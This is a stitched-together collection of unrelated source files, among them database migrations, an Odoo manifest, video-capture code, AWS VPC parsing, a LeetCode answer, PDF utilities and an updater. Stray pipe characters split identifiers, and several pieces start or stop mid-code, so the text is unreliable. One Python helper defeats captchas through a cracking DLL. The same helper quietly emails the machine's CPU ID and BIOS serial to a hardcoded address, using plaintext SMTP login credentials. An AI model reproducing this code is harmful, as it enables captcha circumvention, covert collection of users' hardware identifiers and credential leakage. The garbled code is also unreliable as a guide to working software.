op.alter_column(
table_name='speaklist',
column_name='filename',
type_=sa.Text()
)
op.alter_column(
table_name='shortener',
column_name='filename',
type_=sa.Text()
)
op.alter_column(
table_name='shortener',
column_name='key',
type_=sa.Text()
)
op.alter_column(
| table_name='machinelearning',
column_name='key',
type_=sa.Text()
)
op.alter_column(
table_name='machinelearning',
column_name='group_id',
type_=sa.Text()
)
op.alter_column(
table_name='globalobjectstorage',
column_name='key',
type_=sa.Text()
)
op.drop_index(dbtableprefix + 'ix_uploads_yamlfile', table_name='upl | oads')
|
# -*- coding: utf-8 -*-
##############################################################################
#
# This file is part of CampOS Event,
# an Odoo module.
#
# Copyright (c) 2015 Stein & Gabelgaard ApS
# http://www.steingabelgaard.dk
# Hans Henrik G | aelgaard
#
# CampOS Event is free software | :
# you can redistribute it and/or modify it under the terms of the GNU
# Affero General Public License as published by the Free Software
# Foundation,either version 3 of the License, or (at your option) any
# later version.
#
# CampOS Event is distributed
# in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
# even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with CampOS Event.
# If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': "CampOS Event",
'summary': """
Scout Camp Management Solution""",
# 'description': put the module description in README.rst
'author': "Hans Henrik Gabelgaard",
'website': "http://www.steingabelgaard.dk",
# Categories can be used to filter modules in modules listing
# Check http://goo.gl/0TfwzD for the full list
'category': 'Uncategorized',
'version': '0.1',
'license': 'AGPL-3',
# any module necessary for this one to work correctly
'depends': [
'base',
'mail',
'event',
'website',
'portal',
'survey',
'website_event_register_free',
'base_suspend_security',
'website_jquery_ui',
'base_geoengine',
'geoengine_partner',
'web_widget_color',
'project_issue',
'project_model_to_issue',
'website_event_track',
'web_widget_datepicker_options',
],
# always loaded
'data': [
'views/res_country.xml',
'views/product_template.xml',
'views/campos_staff_del_prod.xml',
'security/campos_event_security.xml',
'security/campos_subcamp_exception.xml',
'security/campos_subcamp.xml',
'security/campos_registration_view.xml',
'security/campos_function_view.xml',
'security/ir.model.access.csv',
'security/ir.rule.csv',
'security/campos_staff_del_prod.xml',
'data/campos.municipality.csv',
'data/campos.scout.org.csv',
'data/job_ask_project.xml',
'views/templates.xml',
'views/participant_view.xml',
'views/event_registration_view.xml',
'views/committee_view.xml',
'views/municipality_view.xml',
"views/scout_org_view.xml",
"views/res_partner_view.xml",
"views/job_view.xml",
"views/job_template.xml",
"views/mail_templates.xml",
"views/confirm_template.xml",
"views/event_view.xml",
#"views/portal_menu.xml",
"views/res_users_view.xml",
'views/campos_menu.xml',
'views/campos_subcamp_exception.xml',
'views/campos_subcamp.xml',
'views/event_partner_reg_template.xml',
'views/meeting_proposal_template.xml',
'views/event_track_view.xml',
'views/campos_camp_area.xml',
'data/camp_area_committee.xml',
'data/participant_number.xml',
'security/campos_par_tag.xml',
'views/campos_par_tag.xml',
'security/campos_reg_tag.xml',
'views/campos_reg_tag.xml',
'views/extern_jobber_template.xml',
],
# only loaded in demonstration mode
'demo': [
'demo.xml',
],
}
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# IkaLog
# ======
# Copyright (C) 2015 Takeshi HASEGAWA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import time
import threading
import cv2
from ikalog.utils import *
from ikalog.inputs.win.videoinput_wrapper import VideoInputWrapper
from ikalog.inputs import VideoInput
class DirectShow(VideoInput):
# override
def _enumerate_sources_func(self):
return self._videoinput_wrapper.get_device_list()
def read_raw(self):
if self._device_id is None:
return None
frame = self._videoinput_wrapper.get_pixels(
self._device_id,
parameters=(
self._videoinput_wrapper. | VI_BGR +
| self._videoinput_wrapper.VI_VERTICAL_FLIP
)
)
return frame
# override
def _read_frame_func(self):
frame = self.read_raw()
return frame
# override
def _initialize_driver_func(self):
pass
# override
def _cleanup_driver_func(self):
pass
# override
def _is_active_func(self):
return (self._device_id is not None)
# override
def _select_device_by_index_func(self, source, width=1280, height=720, framerate=59.94):
device_id = int(source)
vi = self._videoinput_wrapper
self.lock.acquire()
try:
if self._device_id is not None:
raise Exception('Need to deinit the device')
formats = [
{'width': width, 'height': height, 'framerate': None},
{'width': width, 'height': height, 'framerate': framerate},
]
for fmt in formats:
if fmt['framerate']:
vi.set_framerate(device_id, fmt['framerate'])
retval = vi.init_device(
device_id,
flags=self._videoinput_wrapper.DS_RESOLUTION,
width=fmt['width'],
height=fmt['height'],
)
if retval:
self._source_width = vi.get_frame_width(device_id)
self._source_height = vi.get_frame_height(device_id)
success = \
(width == self._source_width) and (
height == self._source_height)
if success or (not self.cap_optimal_input_resolution):
self._device_id = device_id
break
vi.deinit_device(device_id)
# end of for loop
if self._device_id is None:
IkaUtils.dprint(
'%s: Failed to init the capture device %d' %
(self, device_id)
)
finally:
self.lock.release()
# override
def _select_device_by_name_func(self, source):
IkaUtils.dprint('%s: Select device by name "%s"' % (self, source))
try:
index = self.enumerate_sources().index(source)
except ValueError:
IkaUtils.dprint('%s: Input "%s" not found' % (self, source))
return False
IkaUtils.dprint('%s: "%s" -> %d' % (self, source, index))
self._select_device_by_index_func(index)
def __init__(self):
self.strict_check = False
self._device_id = None
self._warned_resolution = False
self._videoinput_wrapper = VideoInputWrapper()
super(DirectShow, self).__init__()
if __name__ == "__main__":
obj = DirectShow()
list = obj.enumerate_sources()
for n in range(len(list)):
IkaUtils.dprint("%d: %s" % (n, list[n]))
dev = input("Please input number (or name) of capture device: ")
obj.select_source(dev)
k = 0
while k != 27:
frame = obj.read_frame()
if frame is not None:
cv2.imshow(obj.__class__.__name__, frame)
k = cv2.waitKey(1)
if k == ord('s'):
import time
cv2.imwrite('screenshot_%d.png' % int(time.time()), frame)
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License
from keystone.contrib.ex | tensions.admin.osksadm.extension_handler\
import ExtensionHandler as KSADMExtensionHandler
from keystone.contrib.extensions.admin.oskscatalog.extension_handler\
import ExtensionHandler as KSCATALOGExtensionHandler
def configure_extensions(mapper, options):
#TODO: Make extensions configurable.
ksadm_extenion_handler = KSADMExtensionHandler()
ksadm_extenion_handler.map_extension_methods(mapper, options)
| kscatalog_extension_handler = KSCATALOGExtensionHandler()
kscatalog_extension_handler.map_extension_methods(mapper, options)
|
# -*- coding: utf-8 -*-
import netaddr
from opinel.utils.aws import get_name
from opinel.utils.globals import manage_dictionary
from opinel.utils.fs import load_data, read_ip_ranges
from AWSScout2.utils import ec2_classic, get_keys
from AWSScout2.configs.regions import RegionalServiceConfig, RegionConfig
from AWSScout2.configs.vpc import VPCConfig as SingleVPCConfig
########################################
# Globals
########################################
protocols_dict = load_data('protocols.json', 'protocols')
########################################
# VPCRegionConfig
########################################
class VPCRegionConfig(RegionConfig):
"""
VPC configuration for a single AWS region
"""
def parse_customer_gateway(self, global_params, region, cgw):
cgw['id'] = cgw.pop('CustomerGatewayId')
self.customer_gateways[cgw['id']] = cgw
def parse_flow_log(self, global_params, region, fl):
"""
:param global_params:
:param region:
:param fl:
:return:
"""
get_name(fl, fl, 'FlowLogId')
fl_id = fl.pop('FlowLogId')
self.flow_logs[fl_id] = fl
def parse_network_acl(self, global_params, region, network_acl):
"""
:param global_params:
:param region:
:param network_acl:
:return:
"""
vpc_id = network_acl['VpcId']
network_acl['id'] = network_acl.pop('NetworkAclId')
get_name(network_acl, network_acl, 'id')
manage_dictionary(network_acl, 'rules', {})
network_acl['rules']['ingress'] = self.__parse_network_acl_entries(network_acl['Entries'], False)
network_acl['rules']['egress'] = self.__parse_network_acl_entries(network_acl['Entries'], True)
network_acl.pop('Entries')
# Save
manage_dictionary(self.vpcs, vpc_id, SingleVPCConfig(self.vpc_resource_types))
self.vpcs[vpc_id].network_acls[network_acl['id']] = network_acl
def __parse_network_acl_entries(self, entries, egress):
"""
:param entries:
:param egress:
:return:
"""
acl_dict = {}
for entry in entries:
if entry['Egress'] == egress:
acl = {}
for key in ['RuleAction', 'RuleNumber']:
acl[key] = entry[key]
acl['CidrBlock'] = entry['CidrBlock'] if 'CidrBlock' in entry else entry['Ipv6CidrBlock']
acl['protocol'] = protocols_dict[entry['Protocol']]
if 'PortRange' in entry:
from_port = entry['PortRange']['From'] if entry['PortRange']['From'] else 1
to_port = entry['PortRange']['To'] if entry['PortRange']['To'] else 65535
acl['port_range'] = from_port if from_port == to_port else str(from_port) + '-' + str(to_port)
else:
acl['port_range'] = '1-65535'
acl_dict[acl.pop('RuleNumber')] = acl
return acl_dict
def parse_route_table(self, global_params, region, rt):
route_table = {}
vpc_id = rt['VpcId']
get_name(rt, route_table, 'VpcId') # TODO: change get_name to have src then dst
get_keys(rt, route_table, ['Routes', 'Associations', 'PropagatingVgws'])
# Save
manage_dictionary(self.vpcs, vpc_id, SingleVPCConfig(self.vpc_resource_types))
self.vpcs[vpc_id].route_tables[rt['RouteTableId']] = route_table
def parse_subnet(self, global_params, region, subnet):
"""
:param global_params:
:param region:
:param subnet:
:return:
"""
vpc_id = subnet['VpcId']
manage_dictionary(self.vpcs, vpc_id, SingleVPCConfig(self.vpc_resource_types))
subnet_id = subnet['SubnetId']
get_name(subnet, subnet, 'SubnetId')
subnet['flow_logs'] = []
# Save
manage_dictionary(self.vpcs, vpc_id, SingleVPCConfig(self.vpc_resource_types))
self.vpcs[vpc_id].subnets[subnet_id] = subnet
def parse_vpc(self, global_params, region_name, vpc):
"""
:param global_params:
:param region_name:
:param vpc:
:return:
"""
vpc_id = vpc['VpcId']
# Save
manage_dictionary(self.vpcs, vpc_id, SingleVPCConfig(self.vpc_resource_types))
self.vpcs[vpc_id].name = get_name(vpc, {}, 'VpcId')
def parse_vpn_connection(self, global_params, region_name, vpnc):
vpnc['id'] = vpnc.pop('VpnConnectionId')
self.vpn_connections[vpnc['id']] = vpnc
def parse_vpn_gateway(self, global_params, region_name, vpng):
vpng['id'] = vpng.pop('VpnGatewayId')
self.vpn_gateways[vpng['id']] = vpng
########################################
# VPCConfig
########################################
class VPCConfig(RegionalServiceConfig):
"""
VPC configuration for all AWS regions
"""
region_config_class = VPCRegionConfig
def __init__(self, service_metadata, thread_config):
super(VPCConfig, self).__init__(service_metadata, thread_config)
########################################
##### VPC analysis functions
########################################
#
# Add a display name for all known CIDRs
#
known_cidrs = {'0.0.0.0/0': 'All'}
def put_cidr_name(aws_config, current_config, path, current_path, resource_id, callback_args):
if 'cidrs' in current_config:
cidr_list = []
for cidr in current_config['cidrs']:
if type(cidr) == dict:
cidr = cidr['CIDR']
if cidr in known_cidrs:
cidr_name = known_cidrs[cidr]
else:
cidr_name = get_cidr_name(cidr, callback_args['ip_ranges'], callback_args['ip_ranges_name_key'])
known_cidrs[cidr] = cidr_name
cidr_list.append({'CIDR': cidr, 'CIDRName': cidr_name})
current_config['cidrs'] = cidr_list
#
# Read display name for CIDRs from ip-ranges files
#
aws_ip_ranges = {} # read_ip_ranges(aws_ip_ranges_filename, False)
def get_cidr_name(cidr, ip_ranges_files, ip_ranges_name_key):
for filename in ip_ranges_files:
ip_ranges = read_ip_ranges(filename, local_file = True)
for ip_range in ip_ranges:
ip_prefix = netaddr.IPNetwork(ip_range['ip_prefix'])
cidr = netaddr.IPNetwork(cidr)
if cidr in ip_prefix:
return ip_range[ip_ranges_name_key].strip()
for ip_range in aws_ip_ranges:
ip_prefix = netaddr.IPNetwork(ip_range['ip_prefix'])
cidr = netaddr.IPNetwork | (cidr)
if cidr in ip_prefix:
return 'Unkn | own CIDR in %s %s' % (ip_range['service'], ip_range['region'])
return 'Unknown CIDR'
#
# Propagate VPC names in VPC-related services (info only fetched during EC2 calls)
#
def propagate_vpc_names(aws_config, current_config, path, current_path, resource_id, callback_args):
if resource_id == ec2_classic:
current_config['name'] = ec2_classic
else:
target_path = copy.deepcopy(current_path)
target_path[1] = 'ec2'
target_path.append(resource_id)
target_path.append('Name')
target_path = '.'.join(target_path)
current_config['name'] = get_value_at(aws_config, target_path, target_path)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('organizations', '0002_migrate_locations_to_facilities'),
('notifications', '0003_auto_20150912_2049'),
]
operations = [
migrations.AlterField(
model_name=' | notification',
name='location',
field=models.ForeignKey(verbose_name='facility', to='organizations.Facility'),
),
migrations.RenameField(
model_name='notification',
old_name='location',
new_name='facility',
),
migrations.AlterField(
model_name='notification',
name='facility',
field=models.ForeignKey(to='organizations.Faci | lity'),
),
]
|
#__author__ = 'hello'
# -*- coding: cp936 -*-
import re
import os
import random
import json
import string
import ctypes
from myexception import *
PATH = './img/'
dm2 = ctypes.WinDLL('./CrackCaptchaAPI.dll')
if not os.path.exists('./img'):
os.mkdir('./img')
def str_tr(content):
instr = "0123456789"
outstr ="QAEDTGUJOL"
trantab = string.maketrans(instr,outstr)
return content.translate(trantab)
def getHid():
import wmi
m = wmi.WMI()
a = ''
b = ''
for cpu in m.Win32_Processor():
a = cpu.Processorid.strip()
for bd in m.Win32_BIOS():
b= bd.SerialNumber.strip()
return a+b
def getEightRandomString():
return ''.join(random.sample(string.ascii_letters,8))
def getCToken(content):
s = ''
pattern = re.compile('securityCToken = "([+-]?\d*)"')
match = pattern.search(content)
if match:
s = match.group(1)
return s
def GetCaptcha(content):
global PATH
filename = ''.join(random.sample(string.ascii_letters,8))
filename += '.jpg'
filename = PATH+filename
img = None
try:
img = open(filename,'wb')
img.write(content)
except IOError:
raise FileCanNotCreate('open file error')
finally:
if img:
img.close()
dm2.D2File.argtypes=[ctypes.c_char_p, ctypes.c_char_p, ctypes.c_char_p, ctypes.c_char_p, ctypes.c_short, ctypes.c_int, ctypes.c_char_p]
dm2.D2File.restype = ctypes.c_int
key = ctypes.c_char_p('fa6fd217145f273b59d7e72c1b63386e')
id = ctypes.c_long(54)
user = ctypes.c_char_p('test')
pas = ctypes.c_char_p('test')
timeout = ctypes.c_short(30)
result = ctypes.create_string_buffer('/0'*100)
ret = -1
ret = dm2.D2File(key,user, pas, filename,timeout,id,(result))
if ret > 0:
return result.value
elif ret == -101:
raise D2FILE(u'Óà¶î²»×ã,ÐèÒª³äÖµ')
elif ret > -199:
raise D2FILE('user info error')
elif ret == -208:
raise D2FILE('software can not user')
elif ret == -210:
raise D2FILE('invalid user')
elif ret == -301:
raise D2FILE('can not find dll')
else:
raise D2FILE(u'ʶ±ð¿â³ö´í')
def GetTimeSlot(content,num):
try:
timeslot = json.loads(content)
slotLen = len(timeslot['timeSlots'])
if num < slotLen:
return timeslot['timeSlots'][num]['startTime'],timeslot['timeSlots]'[num]['timeslotID']]
elif slotLen > 0:
return timeslot['timeSlots'][slotLen-1]['startTime'],timeslot['timeSlots]'[slotLen-1]['timeslotID']]
except ValueError,e:
raise NoJsonData('')
def sendEmail(count):
import smtplib
from email.mime.text import MIMEText
from email.header import Header
smtpserver = 'smtp.163.com'
sender = 'sghcarbon@163.com'
receiver = 'sghcarbon@163.com'
subject = u'Ô¤¶©¸öÊý'
user = 'sghcarbon'
pas = 'carbon216'
content = getHid()+u'Ô¤¶©¸öÊý:'+str(count)
msg = MIMEText(content,'plain','utf-8')
msg['Subject'] | = Header(subject,'utf-8')
msg['From'] = sender
msg['To'] = receiver
try:
send_smtp = smtplib.SMTP()
send_smtp.connect(smtpserver)
send_smtp.login(user,pas)
| send_smtp.sendmail(sender,receiver,msg.as_string())
send_smtp.close()
print 'ok'
except:
print 'error'
|
class Solution(object):
def findPaths(self, m, n, N, i, j):
"""
:type m: int
:type n: int
:type N: int
:type i: int
:type j: int
:rtype: int
"""
MOD = 1000000007
paths = 0
cur = {(i, j): 1}
for i in xrange(N):
next = collections.defaultdict(int)
for (x, y), cnt in cur.iteritems():
for dx, dy | in [[-1, 0], [0, 1], [1, 0], [0, -1]]:
| nx = x + dx
ny = y + dy
if nx < 0 or ny < 0 or nx >= m or ny >= n:
paths += cnt
paths %= MOD
else:
next[(nx, ny)] += cnt
next[(nx, ny)] %= MOD
cur = next
return paths
# 94 / 94 test cases passed.
# Status: Accepted
# Runtime: 232 ms
# beats 75.36 %
|
h = (ay - y + h)
return x, (ay - y - h), w, h
return x, (ay - y)
def getBox(box, pagesize):
"""
Parse sizes by corners in the form:
<X-Left> <Y-Upper> <Width> <Height>
The last to values with negative values are interpreted as offsets form
the right and lower border.
"""
box = str(box).split()
if len(box) != 4:
raise Exception, "box not defined right way"
x, y, w, h = map(getSize, box)
return getCoords(x, y, w, h, pagesize)
def getPos(position, pagesize):
"""
Pair of coordinates
"""
position = str(position).split()
if len(position) != 2:
raise Exception, "position not defined right way"
x, y = map(getSize, position)
return getCoords(x, y, None, None, pagesize)
def getBool(s):
" Is it a boolean? "
return str(s).lower() in ("y", "yes", "1", "true")
_uid = 0
def getUID():
" Unique ID "
global _uid
_uid += 1
return str(_uid)
_alignments = {
"left": TA_LEFT,
"center": TA_CENTER,
"middle": TA_CENTER,
"right": TA_RIGHT,
"justify": TA_JUSTIFY,
}
def getAlign(value, default=TA_LEFT):
return _alignments.get(str(value).lower(), default)
#def getVAlign(value):
# # Unused
# return str(value).upper()
GAE = "google.appengine" in sys.modules
if GAE:
STRATEGIES = (
StringIO.StringIO,
StringIO.StringIO)
else:
STRATEGIES = (
StringIO.StringIO,
tempfile.NamedTemporaryFile)
class pisaTempFile(object):
"""A temporary file implementation that uses memory unless
either capacity is breached or fileno is requested, at which
point a real temporary file will be created and the relevant
details returned
If capacity is -1 the second strategy will never be used.
Inspired by:
http://code.activestate.com/recipes/496744/
"""
STRATEGIES = STRATEGIES
CAPACITY = 10 * 1024
def __init__(self, buffer="", capacity=CAPACITY):
"""Creates a TempFile object containing the specified buffer.
If capacity is specified, we use a real temporary file once the
file gets larger than that size. Otherwise, the data is stored
in memory.
"""
#if hasattr(buffer, "read"):
#shutil.copyfileobj( fsrc, fdst[, length])
self.capacity = capacity
self.strategy = int(len(buffer) > self.capacity)
try:
self._delegate = self.STRATEGIES[self.strategy]()
except:
# Fallback for Google AppEnginge etc.
self._delegate = self.STRATEGIES[0]()
self.write(buffer)
def makeTempFile(self):
" Switch to next startegy. If an error occured stay with the first strategy "
if self.strategy == 0:
try:
new_delegate = self.STRATEGIES[1]()
new_delegate.write(self.getvalue())
self._delegate = new_delegate
self.strategy = 1
log.warn("Created temporary file %s", self.name)
except:
self.capacity = - 1
def getFileName(self):
" Get a named temporary file "
self.makeTempFile()
return self.name
def fileno(self):
"""Forces this buffer to use a temporary file as the underlying.
object and returns the fileno associated with it.
"""
self.makeTempFile()
return self._delegate.fileno()
def getvalue(self):
" Get value of file. Work around for second strategy "
if self.strategy == 0:
return self._delegate.getvalue()
self._delegate.flush()
self._delegate.seek(0)
return self._delegate.read()
def write(self, value):
" If capacity != -1 and length of file > capacity it is time to switch "
if self.capacity > 0 and self.strategy == 0:
len_value = len(value)
if len_value >= self.capacity:
needs_new_strategy = True
else:
self.seek(0, 2) # find end of file
needs_new_strategy = \
(self.tell() + len_value) >= self.capacity
if needs_new_strategy:
self.makeTempFile()
self._delegate.write(value)
def __getattr__(self, name):
try:
return getattr(self._delegate, name)
except AttributeError:
# hide the delegation
e = "object '%s' has no attribute '%s'" \
% (self.__class__.__name__, name)
raise AttributeError(e)
_rx_datauri = re.compile("^data:(?P<mime>[a-z]+/[a-z]+);base64,(?P<data>.*)$", re.M | re.DOTALL)
class pisaFileObject:
"""
XXX
"""
def __init__(self, uri, basepath=None):
self.basepath = basepath
self.mimetype = None
self.file = None
self.data = None
self.uri = None
self.local = None
self.tmp_file = None
uri = str(uri)
log.debug("FileObject %r, Basepath: %r", uri, basepath)
# Data URI
if uri.startswith("data:"):
m = _rx_datauri.match(uri)
self.mimetype = m.group("mime")
self.data = base64.decodestring(m.group("data"))
else:
# Check if we have an external scheme
if basepath and not (uri.startswith("http://") or uri.startswith("https://")):
urlParts = urlparse.urlparse(basepath)
else:
urlParts = urlparse.urlparse(uri)
log.debug("URLParts: %r", urlParts)
# Drive letters have len==1 but we are looking for things like http:
if len(urlParts[0]) > 1 :
# External data
if basepath:
uri = urlparse.urljoin(basepath, uri)
#path = urlparse.urlsplit(url)[2]
#mimetype = getMimeType(path)
# Using HTTPLIB
server, path = urllib.splithost(uri[uri.find("//"):])
if uri.startswith("https://"):
conn = httplib.HTTPSConnection(server)
else:
conn = httplib.HTTPConnection(server)
conn.request("GET", path)
r1 = conn.getresponse()
# log.debug("HTTP %r %r %r %r", server, path, uri, r1)
if (r1.status, r1.reason) == (200, "OK"):
# data = r1.read()
self.mimetype = r1.getheader("Content-Type", None).split(";")[0]
self.uri = uri
if r1.getheader("content-encoding") == "gzip":
# zbuf = cStringIO.StringIO(data)
import gzip
self.file = gzip.GzipFile(mode="rb", fileobj=r1)
#data = zfile.read()
#zfile.close()
else:
self.file = r1
| # self.file = urlResponse
else:
urlResponse = urllib2.urlopen(uri)
self.mimetype = urlResponse.info().get("Content-Type", None).split(";")[0]
self.uri = urlResponse.geturl()
self.file = urlResponse
else:
# Local data
| if basepath:
uri = os.path.normpath(os.path.join(basepath, uri))
if os.path.isfile(uri):
self.uri = uri
self.local = uri
self.setMimeTypeByName(uri)
self.file = open(uri, "rb")
def getFile(self):
if self.file is not None:
return self.file
if self.data is not None:
return pisaTempFile(self.data)
return None
def getNamedFile(self):
if self.notFound():
return None
if self.local:
return str(self.local)
if not self.tmp_file:
self.tmp_ |
#!/usr/bin/python
import sys, os, re
import json
import argparse
import pprint
arg_parser = argparse.ArgumentParser(description='Define tests')
arg_parser.add_argument('-p', '--pretty-print', action="store_true", help="select human friendly output, default is CSV")
arg_parser.add_argument('-i', '--info', action="store_true", help="show info about the data available in the specified directory")
arg_parser.add_argument('-k', '--show-keys', action="store_true", help="show available keys")
arg_parser.add_argument('-a', '--all-connections', action="store_true", help="extract results for all connections")
arg_parser.add_argument('-c', '--concurrent', default=0, help="filter results with specified concurrency", type=int)
arg_parser.add | _argument('in_dir', help="Input directory contatining JSON files")
arg_parser.add_argument('keys', nargs=argparse.REMAINDER, help="keys to extract")
args = arg_parser.parse_args()
def load_json(fname):
return json | .load(open(fname, "r"))
def load_all(src_dir):
data = {}
file_list = os.listdir(src_dir)
for f in file_list:
if not os.path.splitext(f)[1] == ".json":
continue
fp = os.path.join(src_dir, f)
try:
data[f] = load_json(fp)
except ValueError:
print("Skipping corrupted file: %s" % f)
continue
return data
def dotkey(tree_root, dotted_key):
dotted_key = dotted_key.split(".")
value = tree_root
for key in dotted_key:
value = value[key]
return value
def get_keys(f):
keys = []
t = data[f]
unvisited = list(t.keys())
while len(unvisited) > 0:
k = unvisited.pop()
child = dotkey(t, k)
if type(child) != dict:
keys.append(k)
else:
for kname in child.keys():
unvisited.append(k+"."+kname)
return keys
# unvisited += t[k]
# values = []
# k = key.split(".")
# for d in data:
# values.append(get_value(d, k))
# return values
def print_csv_header(columns):
out = "measurement"
for title in columns:
out += ", " + title
print(out)
def get_values_measurement(tree, keys):
out = []
for key in keys:
try:
out.append(dotkey(tree, key))
except KeyError:
out.append("N/A")
return out
def print_values(measure, values):
if args.pretty_print:
print("Measure: %s" % measure)
for v in values:
print("\t%s" % (v,))
else:
s = measure
for v in values:
s += "," + str(v)
print(s)
def expand_keys(template_measure):
"""For each key that contains conn_N will add all other conn_* keys with the
same suffix"""
new_keys = args.keys[:]
all_keys = get_keys(template_measure)
for ukey in args.keys:
match = re.search(r"conn_[0-9]+\.", ukey)
if match:
suffix = ukey[match.end():]
new_keys.remove(ukey)
for skey in all_keys:
if re.search(suffix+"$", skey):
new_keys.append(skey)
return new_keys
def filter_measures(data, concurrent):
"""Return a filtered data dictionary containing only the selected concurrent number"""
measures = list(data.keys())
for measure in measures:
conc = get_values_measurement(data[measure], ["concurrent"])[0]
if conc != concurrent:
del data[measure]
return data
data = load_all(args.in_dir)
if args.info:
descrs = get_all_values("name")
print("These measurements are available:")
for d in sorted(descrs, key=lambda x: int(x.split("_")[0])):
print(d, ":", descrs[d][0])
sys.exit(0)
if args.show_keys:
f = sorted(data.keys())[-1]
print("Reading keys from file %s" % f)
ks = get_keys(f)
for k in sorted(ks):
print(k)
sys.exit(0)
if args.all_connections and args.concurrent == 0:
print("Error: -a requires -c")
sys.exit(1)
if args.concurrent != 0:
data = filter_measures(data, args.concurrent)
if args.all_connections:
new_keys = expand_keys(list(data.keys())[0])
else:
new_keys = args.keys[:]
if not args.pretty_print:
print_csv_header(new_keys)
for measure in data.keys():
values = get_values_measurement(data[measure], new_keys)
print_values(measure, values)
|
alternative_gp.append(gp.lower())
# Comment out the line beflow to test the source updater
# alternative_gp += ["%USERPROFILE%\AppData\Local\GitHub\PORTAB~1\bin\git.exe", "C:\Program Files (x86)\Git\bin\git.exe"]
# Returns a empty string if failed
output = GitUpdater().git_exec(gp, 'version')
if output:
# Found a working git path.
self.logger.debug("Found git path %s" % gp)
htpc.settings.set('git_path', gp)
return True
if alternative_gp and not output:
self.logger.debug("Checking for alternate git location")
for current_gp in alternative_gp:
self.logger.debug("Testing git path %s" % current_gp)
output = GitUpdater().git_exec(current_gp, 'version')
if output:
self.logger.debug("Found git path %s and it works!" % current_gp)
self.logger.debug("Saving git path %s to settings" % current_gp)
htpc.settings.set('git_path', current_gp)
return True
return False
@cherrypy.expose()
@cherrypy.tools.json_out()
def index(self, force=False):
""" Update on POST. Check for new updates on GET. """
if cherrypy.request.method.upper() == 'POST':
Thread(target=self.updateEngine.update).start()
return 1
if cherrypy.request.method.upper() == 'POST' and force:
self.check_update()
Thread(target=self.updateEngine.update).start()
return 1
else:
return self.check_update()
@cherrypy.expose()
@cherrypy.tools.json_out()
def updatenow(self):
Thread(target=self.updateEngine.update).start()
@cherrypy.expose()
@cherrypy.tools.json_out()
def status(self):
""" method to determine if HTPC Manager is currently updating """
return self.updateEngine.UPDATING
def check_update(self):
"""
Check for updates
Returns dict() with the following indexes:
UpdateNeeded True if an update is needed, False if an update is not needed OR not possible
latestVersion Commit hash of the most recent commit
currentVersion Commit hash for the version currently in use
versionsBehind How many versions is the current version behind the latest version
"""
output = {'updateNeeded': True, 'latestVersion': 'Unknown', 'currentVersion': 'Unknown', 'versionsBehind': 'Unknown'}
self.logger.info("Checking for updates from %s." % self.updateEngineName)
# Get current and latest version
# current can return True, False, Unknown, and SHA
current = self.updateEngine.current()
htpc.CURRENT_HASH = current
# Can return True, False
latest = self.updateEngine.latest()
htpc.LATEST_HASH = latest
self.logger.debug("Latest commit is %s" % latest)
self.logger.debug("Current commit is %s" % current)
if latest is False:
self.logger.error("Failed to determine the latest version for HTPC Manager.")
else:
output['latestVersion'] = latest
if current is False:
self.logger.error("Failed to determine the current version for HTPC Manager.")
else:
output['currentVersion'] = current
# If current or latest failed, updating is not possible
if current is False or latest is False:
self.logger.debug("Cancel update.")
output['updateNeeded'] = False
return output
# If HTPC Manager is up to date, updating is not needed
if current == latest and current != "Unknown":
self.logger.info("HTPC Manager is Up-To-Date.")
| output['versionsBehind'] = 0
htpc.COMMITS_BEHIND = 0
output['updateNeeded'] = False
else:
behind = self.behind_by(current, latest)
htpc.COMMITS_BEHIND = behind
output['versionsBehind'] = behind
self.logger.info("Currently " + str(output['versionsBehind']) + " commits behind.")
return output
def behind_by(self, current, latest):
""" Check how many commits between current an | d latest """
self.logger.debug('Checking how far behind latest')
try:
url = 'https://api.github.com/repos/%s/%s/compare/%s...%s' % (gitUser, gitRepo, current, latest)
result = loads(urllib2.urlopen(url).read())
behind = int(result['total_commits'])
self.logger.debug('Behind: ' + str(behind))
return behind
except Exception, e:
self.logger.error(str(e))
self.logger.error('Could not determine how far behind')
return 'Unknown'
@cherrypy.expose()
@cherrypy.tools.json_out()
def branches(self):
return self.updateEngine.branches()
def update_needed(self):
self.logger.info("Running update_needed")
update_avail = self.check_update()
# returns true or false
if update_avail.get("updateNeeded"):
if htpc.settings.get('app_check_for_updates', False):
self.logger.debug("Add update footer")
# Used for the notification footer
htpc.UPDATE_AVAIL = True
else:
htpc.UPDATE_AVAIL = False
# Since im stupid, protect me please.. srsly its for myself.
if htpc.UPDATE_AVAIL and htpc.settings.get("app_auto_update", False) and not htpc.DEBUG:
self.logger.debug("Auto updating now!")
Thread(target=self.updateEngine.update).start()
class GitUpdater():
""" Class to update HTPC Manager using git commands. """
def __init__(self):
""" Set GitHub settings on load """
self.UPDATING = 0
self.git = htpc.settings.get('git_path', 'git')
self.logger = logging.getLogger('htpc.updater')
#self.update_remote_origin() # Disable this since it a fork for now.
def update_remote_origin(self):
self.git_exec(self.git, 'config remote.origin.url https://github.com/Hellowlol/HTPC-Manager.git')
def current_branch_name(self):
output = self.git_exec(self.git, 'rev-parse --abbrev-ref HEAD')
if output:
return output
else:
return htpc.settings.get('branch', 'master2')
def latest(self):
""" Get hash of latest commit on github """
self.logger.debug('Getting latest version from github.')
try:
url = 'https://api.github.com/repos/%s/%s/commits/%s' % (gitUser, gitRepo, self.current_branch_name())
result = loads(urllib2.urlopen(url).read())
